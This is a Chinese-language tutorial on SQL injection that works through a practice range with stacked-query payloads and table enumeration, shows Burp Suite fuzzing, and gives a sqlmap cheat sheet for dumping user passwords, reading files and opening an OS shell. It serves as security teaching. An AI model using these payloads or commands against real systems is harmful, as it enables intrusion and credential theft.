sql注入漏洞简单讲解与实战

SQL注入（SQL Injection）是一种常见的网络安全漏洞，攻击者利用该漏洞向应用程序的数据库发送恶意的SQL查询，从而绕过身份验证、获取敏感数据或者对数据库进行修改。SQL注入通常发生在与数据库交互的Web应用程序中，尤其是那些直接将用户输入拼接到SQL查询语句中的应用程序。

攻击者利用SQL注入漏洞时，常常通过在输入字段中插入SQL代码来干扰、扩展或篡改原始SQL查询的执行。这种攻击可以使攻击者获得未经授权的数据访问权限，例如用户凭证、个人信息或者敏感业务数据。在最严重的情况下，SQL注入可能导致整个数据库的破坏或者数据泄露事件。

为了防止SQL注入攻击，开发人员应采取一些安全措施，包括但不限于使用参数化查询、输入验证、编码输出、最小权限原则和安全漏洞扫描等。同时，定期审查和更新应用程序的代码以及使用Web应用程序防火墙等安全工具也是有效防御SQL注入攻击的重要措施。

常见的sql注入漏洞

方法一：手工注入

第一步：先看看是否有注入点（拿靶场为例子）

1' or '1' = '1

一个简单的万能密码也是爆出了很多东西，这种情况说明存在注入点。

第二步：开始查询数据库

可以通过分号注入多条sql注入语句,三段分号分为三段语句。

1';show databases;#

一下爆出这么多信息，一般在实际挖洞过程中到这一步可以止步了，因为可以避免不必要的麻烦。

第三步：爆表

0';show tables;#

中途要改参数，因为如果是1';show tabales;#会触发1';多爆出两段列表二里的内容，列表一般是从0开始，所以建议过程中还是改改参数，实施精准打击。

看看就因为第一个参数差距还是很明显的，爆出两个表后挨个挨个在看看里面藏了啥。

第四步：爆出表里的信息

0';show columns from `1919810931114514`;#

这里要普及一个知识点：表名为数字时，要用反引号把数值包括起来查询。(反引号在Esc下面那个键，要用shift切换至英文输入法状态)

还要查询下words表里的信息。

0';show columns from words;#

查询这些信息的内容

0';select flag from tables where columns = words;

但是这个靶场select被过滤掉了，但是实际情况可以这样写。

以上是简单的sql注入流程，但是能查到数据库就收手。

方法二：懒人法(fuzz模糊查询)

直接用burpsuite抓包跑字典，全程主打一个懒。（没有burpsuite的可以私聊我,99.99%的黑客都会使用到的工具）

开始还是同样的步骤看是否有注入点。

鼠标右键选择intruder爆破。

先clear一下。

add添加到爆破模块。

点这里选择字典。

开干。

在看看不同的状态码。

出现这种报错，也可以说明有注入点。

这里说明select，updata，delect，drop，insert，where都是被过滤的对象。

接着就是重复步骤了，爆库，爆表，爆表信息。

爆表。

爆信息就可能要止步了，因为你不知道他的表内信息，前面的表名是因为写mysql时的默认参数，但考虑到很多情况，很多时候都是止步爆库。

方法三：sqlmap

我基本不使用sqlmap，虽然sqlmap很强大，但是有句话说的好，用sqlmap是没有灵魂的，多玩玩手工注入。

1.判断当前网站是否能被攻击(sql注入)
sqlmap -u 'url'
2.获得当前数据库
sqlmap -u 'url' --dbs 获得所有数据库
sqlmap -u 'url' --current-db 获得当前数据库
3.获得某个数据库里面的表信息
sqlmap -u 'url' -D jrlt  --tables
4.获得表的列信息
sqlmap -u 'url' -D jrlt  -T users --columns
5.获得具体的数据
sqlmap -u 'url' -D jrlt  -T users  -C password --dump
sqlmap -u 'url' -D jrlt  -T users  -C name,password --dump
 

扩展
sqlmap -u 'url' --sql-shell
弱密码爆破
sqlmap -u 'url' --password
执行系统命令
sqlmap -u 'url' --os-shell
读取文件
sqlmap -u 'url'  --file-read "D:\e.txt"
sql测试
sqlmap -u 'url' --dbs
sqlmap -u 'url' --dbs
 

本文章仅作为技术分享，请不要拿去做然后违法的事，后果既往不咎！！！